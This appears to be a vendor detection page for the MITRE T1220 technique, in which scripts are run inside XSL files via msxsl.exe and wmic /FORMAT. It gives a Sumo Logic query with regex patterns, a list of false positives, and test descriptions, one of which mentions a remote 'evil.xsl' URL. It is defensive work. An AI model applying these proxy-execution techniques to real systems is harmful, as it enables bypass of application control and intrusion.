Detect XSL Script Processing in Sumo Logic CSE
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files support embedded scripting in JavaScript, VBScript, and other languages. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which can execute arbitrary JavaScript or VBScript embedded in local or remote XSL files; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which invokes JScript or VBScript within XSL via WMI. Both techniques leverage trusted Windows tooling to proxy malicious code execution while evading application control solutions such as AppLocker. Since msxsl.exe is not installed by default, adversaries typically drop it alongside their payloads. Real-world usage includes Astaroth, Cobalt Group, and Higaisa.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1220 XSL Script Processing
- Canonical reference
- https://attack.mitre.org/techniques/T1220/
Sumo Detection Query
(_sourceCategory="windows/sysmon" OR _sourceCategory="windows/security")
| where EventID = "1" OR EventCode = "1" OR EventID = "4688"
| eval image_lower = toLowerCase(Image)
| eval cmdline_lower = toLowerCase(CommandLine != null ? CommandLine : CommandLine)
| where (image_lower matches ".*msxsl\.exe$") OR (image_lower matches ".*wmic\.exe$" AND cmdline_lower matches ".*/format.*")
// Classify technique variant
| eval is_msxsl = if(image_lower matches ".*msxsl\.exe$", 1, 0)
| eval is_wmic_format = if(image_lower matches ".*wmic\.exe$" AND cmdline_lower matches ".*/format.*", 1, 0)
| eval remote_load = if(cmdline_lower matches ".*(https?://|ftp://|\\\\\\\\).*", 1, 0)
| eval same_file_arg = if(cmdline_lower matches ".*([^\s]+\.[a-z]+)\s+\1.*", 1, 0)
| eval arbitrary_ext = if(cmdline_lower matches ".*\.(jpeg|jpg|png|gif|txt|dat|bin|log)\s.*", 1, 0)
| eval xsl_format = if(cmdline_lower matches ".*/format[:\s]+[^\s]*\.xslt?.*", 1, 0)
| eval technique_variant = if(is_msxsl=1 AND remote_load=1, "msxsl-remote-xsl",
if(is_msxsl=1 AND same_file_arg=1, "msxsl-same-file",
if(is_msxsl=1 AND arbitrary_ext=1, "msxsl-arbitrary-ext",
if(is_msxsl=1, "msxsl-local-xsl",
if(is_wmic_format=1 AND remote_load=1, "squiblytwo-remote",
if(is_wmic_format=1, "squiblytwo-local", "unknown"))))))
| eval risk_score = is_msxsl + remote_load + same_file_arg + arbitrary_ext + (is_wmic_format * xsl_format)
| table _messageTime, Computer, User, Image, CommandLine, ParentImage, ParentCommandLine, technique_variant, remote_load, same_file_arg, arbitrary_ext, risk_score
| sort by _messageTime descSumo Logic CSE query detecting T1220 XSL Script Processing. Parses Sysmon Event ID 1 or Windows Security Event 4688 to identify msxsl.exe executions and wmic.exe /FORMAT abuse. Computes a risk score and classifies technique variants for analyst triage.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate XSLT processing in document management or reporting pipelines that use msxsl.exe to transform XML data
- IT operations scripts using wmic.exe /FORMAT for administrative reporting with standard WMI output stylesheets
- Development or test environments where msxsl.exe is used as part of automated build and test XML transformation workflows
Other platforms for T1220
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1msxsl.exe Local XSL Script Execution
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing test.xml and test.xsl. Sysmon Event ID 7: Image Load for jscript.dll loaded by msxsl.exe, confirming JScript engine activation. Sysmon Event ID 1: Child process whoami.exe spawned by msxsl.exe (or WScript.Shell). Sysmon Event ID 11: File creation events for test.xml and test.xsl.
- Test 2msxsl.exe Same-File Argument Evasion
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine showing the same filename appearing twice (e.g., 'selfref.xsl selfref.xsl'). Sysmon Event ID 7: Image Load for jscript.dll by msxsl.exe. Sysmon Event ID 11: File creation for selfref.xsl.
- Test 3Squiblytwo — wmic /FORMAT Remote XSL Execution
Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and 'http://127.0.0.1:19823/evil.xsl'. Sysmon Event ID 3: Network Connection attempt from wmic.exe to 127.0.0.1:19823 (connection refused, but event is logged). Sysmon Event ID 22: DNS query if a hostname is used instead of IP.
- Test 4Squiblytwo — wmic /FORMAT Local XSL File
Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and the %TEMP% path to wmic_test.xsl. Sysmon Event ID 7: jscript.dll loaded by wmic.exe. Sysmon Event ID 11: File creation for wmic_test.xsl.
- Test 5msxsl.exe Arbitrary Extension Masking
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing '.jpeg' file extensions instead of .xsl. Sysmon Event ID 7: jscript.dll loaded by msxsl.exe. Sysmon Event ID 11: File creation events for data.jpeg and style.jpeg.
References (10)
- https://attack.mitre.org/techniques/T1220/
- https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- https://lolbas-project.github.io/lolbas/Binaries/Msxsl/
- https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md
- https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_lolbin_msxsl.yml
- https://www.cybereason.com/blog/astaroth-malware-abuses-legitimate-os-and-antivirus-processes
Unlock Pro Content
Get the full detection package for T1220 including response playbook, investigation guide, and atomic red team tests.